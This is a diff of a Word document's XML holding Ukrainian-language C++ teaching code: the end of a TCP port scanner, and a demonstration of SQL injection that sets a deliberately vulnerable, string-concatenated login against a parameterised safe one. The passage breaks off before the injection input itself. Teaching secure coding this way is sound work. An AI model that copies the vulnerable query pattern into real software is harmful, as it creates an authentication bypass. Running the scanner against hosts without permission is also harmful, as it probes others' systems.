-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    std::cout &lt;&lt; "Відкриті порти:\n";</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    int found = 0;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    for (int port : ports) {</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        if (isPortOpen(target, port)) {</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">            std::cout &lt;&lt; "  " &lt;&lt; port &lt;&lt; "/tcp - " &lt;&lt; serviceName(port) &lt;&lt; "\n";</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">            ++found;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        }</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    }</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    if (found == 0) {</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        std::cout &lt;&lt; "  (жодного з перевірених портів не відкрито)\n";</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    }</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">#ifdef _WIN32</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    WSACleanup();</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">#endif</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    return 0;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">}</w:t>
-      </w:r>
+      </w:pPr>
     </w:p>
     <w:bookmarkEnd w:id="23"/>
     <w:bookmarkEnd w:id="24"/>
@@ -3363,713 +3976,849 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve">// Демонстрація SQL-ін'єкції та захисту від неї.</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// Демонстрація SQL-ін'єкції та захисту від неї.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// Потрібна бібліотека SQLite: у Visual Studio додайте sqlite3.c і sqlite3.h</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// до проєкту (амальгама з sqlite.org) або підключіть пакет через NuGet.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#include &lt;iostream&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#include &lt;string&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#include "sqlite3.h"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// Створює навчальну базу в пам'яті з двома обліковими записами</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">sqlite3* setupDatabase() {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3* db = nullptr;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_open(":memory:", &amp;db);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    const char* schema =</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        "CREATE TABLE users ("</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        "  id INTEGER PRIMARY KEY,"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        "  login TEXT NOT NULL,"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        "  password TEXT NOT NULL,"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        "  role TEXT DEFAULT 'user');"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        "INSERT INTO users (login, password, role) "</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        "VALUES ('admin', 'secret123', 'admin');"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        "INSERT INTO users (login, password, role) "</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        "VALUES ('user1', 'pass1', 'user');";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_exec(db, schema, nullptr, nullptr, nullptr);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    return db;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// ВРАЗЛИВИЙ варіант: запит склеюється з рядків, дані користувача</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// потрапляють у текст запиту й змінюють його структуру</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">bool vulnerableLogin(sqlite3* db, const std::string&amp; login,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">                     const std::string&amp; password) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::string query = "SELECT login, role FROM users WHERE login='" + login +</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">                        "' AND password='" + password + "'";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "[ВРАЗЛИВИЙ] Запит: " &lt;&lt; query &lt;&lt; "\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_stmt* stmt = nullptr;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    if (sqlite3_prepare_v2(db, query.c_str(), -1, &amp;stmt, nullptr) != SQLITE_OK) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        std::cout &lt;&lt; "[ВРАЗЛИВИЙ] Помилка SQL: " &lt;&lt; sqlite3_errmsg(db) &lt;&lt; "\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        return false;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    }</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    bool found = (sqlite3_step(stmt) == SQLITE_ROW);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    if (found) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        std::cout &lt;&lt; "[ВРАЗЛИВИЙ] Вхід виконано як: "</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">                  &lt;&lt; sqlite3_column_text(stmt, 0) &lt;&lt; " (роль "</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">                  &lt;&lt; sqlite3_column_text(stmt, 1) &lt;&lt; ")\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    }</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_finalize(stmt);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    return found;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// БЕЗПЕЧНИЙ варіант: структура запиту фіксована, дані передаються</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// окремо через параметри й ніколи не тлумачаться як код SQL</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">bool safeLogin(sqlite3* db, const std::string&amp; login, const std::string&amp; password) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    const char* query = "SELECT login, role FROM users WHERE login=? AND password=?";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "[БЕЗПЕЧНИЙ] Запит: " &lt;&lt; query &lt;&lt; "\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "[БЕЗПЕЧНИЙ] Параметри: ('" &lt;&lt; login &lt;&lt; "', '" &lt;&lt; password &lt;&lt; "')\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_stmt* stmt = nullptr;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_prepare_v2(db, query, -1, &amp;stmt, nullptr);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_bind_text(stmt, 1, login.c_str(), -1, SQLITE_TRANSIENT);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_bind_text(stmt, 2, password.c_str(), -1, SQLITE_TRANSIENT);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    bool found = (sqlite3_step(stmt) == SQLITE_ROW);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    if (found) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        std::cout &lt;&lt; "[БЕЗПЕЧНИЙ] Вхід виконано як: "</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">                  &lt;&lt; sqlite3_column_text(stmt, 0) &lt;&lt; "\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    }</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_finalize(stmt);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    return found;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">int main() {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3* db = setupDatabase();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "=== Коректний вхід ===\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    vulnerableLogin(db, "admin", "secret123");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "\n=== Атака SQL-ін'єкцією ===\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    // Введене значення закриває лапку й додає умову, істинну завжди</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
